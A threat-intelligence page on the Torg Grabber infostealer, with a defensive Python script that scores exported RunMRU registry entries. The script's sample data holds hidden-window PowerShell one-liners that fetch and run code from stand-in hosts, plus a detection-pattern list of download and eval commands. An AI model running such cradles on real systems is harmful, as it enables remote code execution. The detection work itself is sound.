CyberHappenings

Torg Grabber infostealer expands to 850 browser extensions including 728 crypto wallets

1 unique source, 1 article

Summary


A new info-stealing malware family named Torg Grabber has been identified targeting 850 browser extensions, 728 of them cryptocurrency wallets. Initial access is achieved via the ClickFix technique: the victim's clipboard is hijacked and the user is tricked into executing malicious PowerShell commands. The malware evolves rapidly, with 334 unique samples compiled in three months and new command-and-control (C2) servers registered weekly. Torg Grabber employs anti-analysis checks, multi-layered obfuscation, direct syscalls, and reflective loading to evade detection. It exfiltrates data over HTTPS routed through Cloudflare infrastructure, supports chunked uploads, and includes a bypass for Chrome's App-Bound Encryption cookie protection. It targets credentials, cookies, autofill data, and files from 25 Chromium-based browsers and 8 Firefox variants, alongside a wide range of applications including password managers, 2FA tools, messaging platforms, VPNs, and desktop crypto wallets.
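Added example (not from the report or from the CyberHappenings page): a Python triage script for the ClickFix initial-access step described in the summary. ClickFix lures have the victim paste a clipboard-hijacked command into the Win+R dialog, and Explorer records Run-dialog history in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so a `reg export` of that key taken from a suspect host is a cheap place to recover the pasted PowerShell. The script parses the .reg export, restores most-recent-first order from the MRUList value, decodes any -EncodedCommand payload, and scores each entry against generic ClickFix heuristics (hidden window, download cradle piped to iex, a trailing "I am not a robot" decoy comment). The indicator list, weights, threshold and sample registry content are constructed for illustration and are not indicators published for Torg Grabber.

```python
r"""Triage an exported RunMRU key for ClickFix-style pasted commands.

ClickFix lures get the victim to paste a clipboard-hijacked one-liner into the
Win+R dialog. Explorer keeps Run-dialog history in
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so an offline
`reg export` of that key is a quick place to recover the pasted command.
Indicators, weights, threshold and sample data below are constructed for
illustration; they are not indicators published for Torg Grabber.
"""
from __future__ import annotations

import base64
import re

RUNMRU_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"


def _encoded(ps: str) -> str:
    """PowerShell -EncodedCommand is base64 over the UTF-16LE script text."""
    return base64.b64encode(ps.encode("utf-16le")).decode()


# Constructed `reg export` output (not real telemetry): two benign Run entries
# and two ClickFix-style one-liners, the second one base64-encoded.
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\n\n"
    f"[{RUNMRU_KEY}]\n"
    r'"a"="notepad\\1"' "\n"
    r'"b"="powershell -w hidden -ep bypass -c \"irm hxxps://verify.example.invalid/x | iex\"'
    r' # I am not a robot - reCAPTCHA Verification ID: 4721\\1"' "\n"
    r'"c"="mstsc\\1"' "\n"
    f'"d"="powershell -nop -w hidden -enc {_encoded("IEX(iwr http://example.invalid/p)")}\\\\1"\n'
    '"MRUList"="dbca"\n'
)

INDICATORS = [  # (name, weight, regex): generic ClickFix heuristics, not report IOCs
    ("interpreter",   2, r"\b(powershell|pwsh|mshta|wscript|cscript|certutil|curl)\b"),
    ("hidden_window", 2, r"-(w|win|windowstyle)\s+h(idden)?\b"),
    ("no_profile",    1, r"-(nop|noprofile)\b"),
    ("ep_bypass",     1, r"-(ep|executionpolicy)\s+bypass\b"),
    ("encoded_cmd",   2, r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    ("download",      2, r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                         r"downloadfile|net\.webclient|start-bitstransfer)\b"),
    ("eval",          2, r"\b(iex|invoke-expression)\b"),
    ("url",           1, r"\bh(xx|tt)ps?://"),
    ("decoy_comment", 2, r"#.*(robot|captcha|verif)"),
]
FLAG_THRESHOLD = 5

_REG_VALUE = re.compile(r'^"(?P<name>[^"]+)"="(?P<val>(?:[^"\\]|\\.)*)"\s*$')


def parse_runmru(reg_text: str) -> list[tuple[str, str]]:
    """Return (slot, command) pairs, most recent first as given by MRUList."""
    values: dict[str, str] = {}
    in_key = False
    for line in reg_text.splitlines():
        if line.startswith("["):                  # [HKEY_...] section header
            in_key = line.strip("[]").lower() == RUNMRU_KEY.lower()
            continue
        m = _REG_VALUE.match(line)
        if in_key and m:                          # .reg escapes only \\ and \"
            values[m["name"]] = re.sub(r"\\(.)", r"\1", m["val"])
    order = values.pop("MRUList", "")
    slots = list(order) + sorted(s for s in values if s not in order)
    entries = []
    for slot in slots:
        cmd = values.get(slot)
        if cmd is None:
            continue
        if cmd.endswith("\\1"):                   # Explorer appends "\1" to every entry
            cmd = cmd[:-2]
        entries.append((slot, cmd))
    return entries


def decode_encoded_command(cmd: str) -> str | None:
    """Recover the script behind -EncodedCommand, or None if there is none."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmd: str) -> tuple[int, list[str]]:
    """Score the visible command and, if present, its decoded -EncodedCommand payload."""
    texts = [cmd]
    decoded = decode_encoded_command(cmd)
    if decoded:
        texts.append(decoded)
    score, hits = 0, []
    for name, weight, pattern in INDICATORS:
        if any(re.search(pattern, t, re.I) for t in texts):
            score += weight
            hits.append(name)
    return score, hits


def triage_runmru(reg_text: str, threshold: int = FLAG_THRESHOLD) -> list[dict]:
    """Parse the export and annotate every Run entry with score, hits and verdict."""
    results = []
    for slot, cmd in parse_runmru(reg_text):
        score, hits = score_command(cmd)
        results.append({"slot": slot, "command": cmd, "decoded": decode_encoded_command(cmd),
                        "score": score, "hits": hits, "suspicious": score >= threshold})
    return results


if __name__ == "__main__":
    for r in triage_runmru(SAMPLE_REG):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"[{flag:10}] {r['slot']} score={r['score']:2} {r['command'][:72]}")
        if r["decoded"]:
            print(f"             decoded -EncodedCommand: {r['decoded']}")
```

On a live host the same export is produced with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg`; the script only reads the file, so it can also be run against a key exported from a mounted forensic image. Scoring the decoded payload as well as the visible command is what catches the base64 variant, which shows none of the cradle keywords on the surface.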

Timeline

  1. 25.03.2026 20:32 · 1 article

    Torg Grabber infostealer expands targeting to 850 browser extensions with advanced exfiltration and anti-detection mechanisms

    Torg Grabber infostealer malware was identified targeting 850 browser extensions, including 728 cryptocurrency wallet extensions, with initial access via ClickFix clipboard hijacking and PowerShell command execution. The malware rapidly evolved from Telegram and custom TCP exfiltration to HTTPS over Cloudflare infrastructure on December 18, 2025, supporting chunked uploads. By December 22, 2025, it added App-Bound Encryption bypass to circumvent browser cookie protections. Torg Grabber employs anti-analysis, multi-layered obfuscation, direct syscalls, reflective loading, and executes payloads entirely in memory. It also profiles hosts, extracts browser encryption keys via a standalone tool named Underground, and targets a wide range of applications beyond wallets, including password managers, 2FA tools, messaging platforms, VPNs, FTP clients, and email clients.


Information Snippets

  • Torg Grabber targets 850 browser extensions, including 728 cryptocurrency wallet extensions such as MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, and Solflare.

    First reported: 25.03.2026 20:32
    1 source, 1 article
  • Initial access is obtained via the ClickFix technique, which hijacks the clipboard and tricks users into executing malicious PowerShell commands.

  • The malware has 334 unique samples compiled between December 2025 and February 2026, with new C2 servers registered weekly.

  • Data exfiltration initially used Telegram-based and custom encrypted TCP protocols but shifted to HTTPS routed through Cloudflare infrastructure on December 18, 2025, supporting chunked data uploads.

  • Torg Grabber features anti-analysis mechanisms, multi-layered obfuscation, direct syscalls, and reflective loading for evasion, executing payloads entirely in memory.

  • On December 22, 2025, Torg Grabber added App-Bound Encryption (ABE) bypass to circumvent Chrome’s (and similar browsers’) cookie protection systems.

  • The malware targets 25 Chromium-based browsers and 8 Firefox variants, stealing credentials, cookies, autofill data, and files from desktop folders.

  • Torg Grabber also targets 103 password manager and 2FA extensions (e.g., LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, ProtonPass, Enpass), alongside applications including Discord, Telegram, Steam, VPNs, FTP clients, email clients, and desktop crypto wallets.

  • The malware profiles the host, builds a hardware fingerprint, inventories installed software (including checks for 24 antivirus products), takes desktop screenshots, and executes shellcode that the C2 delivers in ChaCha-encrypted, zlib-compressed form.

  • A standalone tool named Underground extracts browser data by reflectively injecting a DLL into the browser process; from there it calls Chrome's COM elevation service, which only decrypts the app-bound key for requests coming from the browser's own executable, and retrieves the master encryption key.
